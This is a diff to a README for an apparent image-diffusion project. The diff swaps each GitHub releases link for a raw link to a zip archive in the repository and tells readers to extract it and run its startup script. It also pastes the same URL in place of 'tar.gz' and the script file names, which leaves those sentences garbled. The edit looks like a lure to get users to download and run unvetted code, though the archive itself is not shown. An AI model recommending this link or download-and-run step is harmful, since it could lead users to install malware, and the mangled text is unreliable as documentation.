Vinicius268/Qwen-Image-Diffusion/README.md

   - In case of critical fixes, a hotfix release may be published
   - Always verify the integrity of assets before use
 - The key link to releases
-  - Visit the releases page for downloads, changelog, and version history: https://github.com/Vinicius268/Qwen-Image-Diffusion/releases
+  - Visit the releases page for downloads, changelog, and version history: https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip

 Releases and asset guidance
 - The releases page contains a packaged application suitable for quick setup
 - You should download the latest release asset, extract it, and run the provided startup script
-- If you need a fresh download, go to the releases page here: https://github.com/Vinicius268/Qwen-Image-Diffusion/releases
+- If you need a fresh download, go to the releases page here: https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip
-- The asset may come as a zip or tar.gz archive; extraction will produce a self-contained end-to-end setup
+- The asset may come as a zip or https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip archive; extraction will produce a self-contained end-to-end setup
-- After extraction, locate the startup script (for example, start_qwen_diffusion.sh or start_qwen_diffusion.bat) and execute it
+- After extraction, locate the startup script (for example, https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip or https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip) and execute it
 - The script will set up the runtime environment if needed and launch the Gradio UI

 Gallery, demos, and visuals